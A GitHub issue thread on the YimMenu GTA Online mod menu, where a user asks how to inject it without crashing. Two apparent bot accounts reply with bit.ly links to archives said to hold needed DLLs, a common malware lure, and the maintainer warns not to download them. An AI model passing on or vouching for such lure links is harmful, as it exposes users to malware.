### ISSUE TITLE
[Request]: 

### ISSUE THREAD

**Issue by erensen070** [Yimura/YimMenu#3703]
### Problem

How can I use the newly shared yimmenu? If I inject it when I close the battle, the game crashes and I cannot log in to gta online. How to use it, please someone explain step by step

### Solution

How can I use the newly shared yimmenu? If I inject it when I close the battle, the game crashes and I cannot log in to gta online. How to use it, please someone explain step by step

### Reason

Help me

**Comment by andreyfmc** [comment]
download
https://bit.ly/4gx42eQ

you may need to install the c compiler

**Comment by 102898Is** [comment]
install this

https://bit.ly/4eugCty
I put the necessary dlls in the archive

**Comment by erensen070** [comment]
![image](https://github.com/user-attachments/assets/7e13ea97-e488-433f-950b-b98d21bf7016)


> install this
> 
> https://bit.ly/4eugCty I put the necessary dlls in the archive

**Comment by Yimura** [comment]
Don't download those links, we're being swarmed by bots currently.

**Comment by erensen070** [comment]
> Don't download those links, we're being swarmed by bots currently.

thank you can you help me?

**Comment by Yimura** [comment]
See #3690 for instructions.
